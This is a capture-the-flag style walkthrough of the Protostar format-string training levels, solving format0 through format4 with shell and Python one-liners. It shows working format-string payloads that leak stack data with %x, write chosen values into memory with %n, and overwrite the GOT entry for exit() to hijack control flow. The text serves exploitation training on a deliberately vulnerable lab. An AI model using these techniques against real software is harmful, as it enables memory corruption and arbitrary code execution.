Exploit Exercises — Protostar Format Levels
This is a protostar walkthrough describing format string exploitation.
This article is the only thing you need to complete these levels.
Format 0
$ ./format0 %64d`python -c 'print "\xef\xbe\xad\xde"'`
you have hit the target correctly :)
When we use %64d
, sprintf
pops 64 bytes from the stack and then adds 0xdeadbeef
and copies it into buffer
causing overflow.
Format 1
Read this first to understand how different variables are stored. Then we look for target
:
$ objdump -t format1 | grep target
08049638 g O .bss 00000004 target
We see the needed variable is in uninitialized data segment called .bss
and has the address 0x08049638
.
Then I tried to print 146 bytes from the stack and tried to find where our buffer is stored:
$ ./format1 ABCD`python -c 'print "%x."*146'`
ABCD804960c.bffff508.8048469.b7fd8304.b7fd7ff4.bffff508.8048435.bffff708.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff588.b7eadc76.2.bffff5b4.bffff5c0.b7fe1848.bffff570.ffffffff.b7ffeff4.804824d.1.bffff570.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff588.a003ccb4.8a519aa4.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff5b4.8048450.8048440.b7ff1040.bffff5ac.b7fff8f8.2.bffff6fe.bffff708.0.bffff8c3.bffff8d8.bffff8ef.bffff907.bffff915.bffff929.bffff94c.bffff963.bffff976.bffff980.bffffe70.bffffe89.bffffec7.bffffedb.bffffef9.bfffff10.bfffff21.bfffff3c.bfffff44.bfffff54.bfffff61.bfffff97.bfffffac.bfffffc0.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.78bfbbf.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff6db.1f.bffffff2.f.bffff6eb.0.0.0.0.0.50000000.f6e2fdf8.67e5aff4.14e8ba4e.6901a7c9.363836.0.0.0.2f2e0000.6d726f66.317461.44434241.252e7825.78252e78.2e78252e.252e7825.
Can you see that 0x44434241
value in the end? Also you can use some bruteforce:
$ for i in {1..1000}; do echo -n "$i ";./format1 "ABCD%$i\$x" | grep 44434241; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
141
142 ABCD44434241
%4$x
is what called “direct access”.
You can see ABCD
above (don’t forget we are on little-endian machine). Now we know the offset and we can try to directly access this variable:
./format1 ABCD`python -c 'print "%142$x"'`
ABCD44434241u
Now we know the offset in the stack in printf
and we can rewrite the value using %n
. Read more about using %n
here. In a nutshell, using %n
you must specify address of int
variable where the size of written data will be written to.
So if you use something like <addr>%141%n
it will pop addr
from the stack and will write the number of written bytes there.
We know the address is 0x08049638
that in little-endian format is \x38\x96\x04\x08
. Now we can simply replace ABCD
with the address:
$ ./format1 `python -c 'print "\x38\x96\x04\x08"+"%142$n"'`
8�you have modified the target :)
Format 2
Now we are supposed to rewrite the variable with a particular value 64.
Now let’s do a bit of bruteforcing to find the offset:
$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format2 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141target is 0 :(
Now we need to find the address of target
variable:
$ objdump -t format2 | grep target
080496e4 g O .bss 00000004 target
Let’s try to rewrite to rewrite the variable with uncertain value:
$ python -c "print '\xe4\x96\x04\x08'+'%4\$n'" | ./format2
��
target is 4 :(
We write 4 bytes and it says about it. If we want to write more, we just need to increase the number of bytes written. In this case the program will get 64 bytes before %4$n
and then it replaces %4$n
with the number of bytes it has already written:
$ python -c "print '\xe4\x96\x04\x08'+'A'*60+'%4\$n'" | ./format2
��AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have modified the target :)
Format 3
We start this challenge with bruteforcing to find the offset:
$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format3 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
11
12 AAAAAA41414141target is 00000000 :(
Now we need to find the memory address of target
:
$ objdump -t format3 | grep target
080496f4 g O .bss 00000004 target
So let’s try to rewrite target
:
$ python -c "print '\xf4\x96\x04\x08'+'%12\$n'" | ./format3
��
target is 00000004 :(
Awesome! It says we rewrote 4 bytes.
Then I tried to extend the string and look and the stack:
$ python -c "print 'AAAABBBBCCCCDDDDEEEEFFFFGGGG'+'%x.'*16" | ./format3
AAAABBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.41414141.42424242.43434343.44444444.45454545.
target is 00000000 :(
Now let’s try to directly take 12th and then look at values on the stack:
$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDDEEEEFFFFGGGG'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.45454545.46464646.47474747.24323125.2e78256e.
target is 0000001c :(
To be clearer let’s draw simple scheme of our stack:
junk <- 1st, 2nd, ... values
...
\xf4\x96\x04\x08 <- 12th value
BBBB <- 13th value
CCCC <- 15th value
DDDD <- 16th value
EEEE
FFFF
GGGG
...
<saved ebp>
<saver ret>
I understand that it could be confusing. Because here numbers don’t have nothing with how the stack grows. They are just argument numbers. If so try to read about direct access in this paper.
Now everything is clear: we need to replace BBBB
, CCCC
, DDDD
with address + i
to rewrite each byte and add needed offsets in order to write the right value.
Let’s try to rewrite the lowest byte first. It must be 0x44
:
$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDD'+'%52u'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDD 0bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.75323525.24323125.2e78256e.252e7825.78252e78.2e78252e.
target is 00000044 :(
Then I tried to rewrite the third bite:
$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%13\$n'" | ./format3
����CCCCDDDD 0
target is 00004444 :(
Awesome, it works. I didn’t know it keeps the number of already written bytes. So it’s easier to write small values first. We need to get 0x01025544
, but we certainly cannot get 0x01
and 0x02
. However we can try to write 0x101
for example. We will write in this order: 0x44
, 0x55
, 0x101
, 0x102
(or maybe 0x202
).
0x55
is a third byte, so we need increase our address just by 1:
$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'" | ./format3
����CCCCDDDD 0 3221222592
target is 00005544 :(
Instead of writing 0x101
and 0x102
we can try to write 0x102
as two byte value:
$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08DDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'+'%173u'+'%14\$n'" | ./format3
������DDDD 0 3221222592 3086843892
you have modified the target :)
Wow, we modified the target :)
Format 4
Now we need to redirect the flow. In order to do so we can just rewrite the return address.
As always we start with finding the offset:
$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format4 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141
Now let’s find the address of hello()
function:
$ objdump -t format4 | grep hello
080484b4 g F .text 0000001e hello
From this point I understood that we are not supposed to rewrite the return address and we need to change the relocation table.
Let’s look at relocations:
$ objdump -TR format4
format4: file format elf32-i386
DYNAMIC SYMBOL TABLE:
00000000 w D *UND* 00000000 __gmon_start__
00000000 DF *UND* 00000000 GLIBC_2.0 fgets
00000000 DF *UND* 00000000 GLIBC_2.0 __libc_start_main
00000000 DF *UND* 00000000 GLIBC_2.0 _exit
00000000 DF *UND* 00000000 GLIBC_2.0 printf
00000000 DF *UND* 00000000 GLIBC_2.0 puts
00000000 DF *UND* 00000000 GLIBC_2.0 exit
080485ec g DO .rodata 00000004 Base _IO_stdin_used
08049730 g DO .bss 00000004 GLIBC_2.0 stdin
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
080496fc R_386_GLOB_DAT __gmon_start__
08049730 R_386_COPY stdin
0804970c R_386_JUMP_SLOT __gmon_start__
08049710 R_386_JUMP_SLOT fgets
08049714 R_386_JUMP_SLOT __libc_start_main
08049718 R_386_JUMP_SLOT _exit
0804971c R_386_JUMP_SLOT printf
08049720 R_386_JUMP_SLOT puts
08049724 R_386_JUMP_SLOT exit
Additionally to look at the relocation table you can use:
$ readelf -r format4
Relocation section '.rel.dyn' at offset 0x304 contains 2 entries:
Offset Info Type Sym.Value Sym. Name
080496fc 00000106 R_386_GLOB_DAT 00000000 __gmon_start__
08049730 00000905 R_386_COPY 08049730 stdin
Relocation section '.rel.plt' at offset 0x314 contains 7 entries:
Offset Info Type Sym.Value Sym. Name
0804970c 00000107 R_386_JUMP_SLOT 00000000 __gmon_start__
08049710 00000207 R_386_JUMP_SLOT 00000000 fgets
08049714 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main
08049718 00000407 R_386_JUMP_SLOT 00000000 _exit
0804971c 00000507 R_386_JUMP_SLOT 00000000 printf
08049720 00000607 R_386_JUMP_SLOT 00000000 puts
08049724 00000707 R_386_JUMP_SLOT 00000000 exit
Good articles about shared libraries and relocations:
- The ELF format - how programs look from the inside
- The C++ compilation process
- Load-time relocation of shared libraries
- Position Independent Code (PIC) in shared libraries
I thought it’s a good idea to try to rewrite exit()
function by the address of hello()
function. Thus we need to rewrite value at the address0x08049724
by 0x080484b4
.
Now let’s use a test exploit:
$ python -c "print '\x24\x97\x04\x08' + '%33968x' + '%4\$n'" > /tmp/exploit.txt
$ gdb format4
GNU gdb (GDB) 7.0.1-debian
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/format4 < /tmp/exploit.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x000084b4 in ?? ()
Awesome. We rewrote the first two bytes and jumped to 0x000084b4
. Let’s do the same with other two bytes. Do not forget to correct the offsets (-4 to the first one because we added new 4 bytes address).
Now run the exploit:
$ python -c "print '\x24\x97\x04\x08\x26\x97\x04\x08' + '%33964x' + '%4\$n' + '%33616x' + '%5\$n'" | ./format4
...
code execution redirected! you win